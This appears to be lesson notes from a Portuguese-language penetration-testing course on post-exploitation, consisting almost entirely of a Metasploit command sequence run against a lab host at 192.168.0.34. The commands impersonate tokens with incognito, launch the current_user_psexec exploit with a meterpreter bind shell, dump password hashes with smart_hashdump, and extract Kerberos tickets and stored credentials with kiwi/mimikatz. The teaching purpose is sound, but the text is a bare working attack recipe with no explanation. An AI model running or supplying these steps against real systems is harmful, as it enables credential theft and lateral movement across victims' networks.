Aula 5 - Exploração pós invasão #2

> sessions 2

> load incognito

> help

> list_tokens -u

> list_tokens -u 

> getuid 

> background

> search current_user_psexec

> use exploit/windows/local/current_user_psexec

> show options

> set SESSION 2

> set payload windows/x64/meterpreter/bind_tcp

> set RHOSTS 192.168.0.34

> show options

> set RHOSTS 192.168.0.34

> getuid

> ipconfig

> background

> use post/windows/gather/smart_hashdump

> show options

> set SESSION 3

> run

> sessions -l

> sessions 3

meterpreter > load kiwi

meterpreter > load mimikatz

meterpreter > kerberos

> creds_all












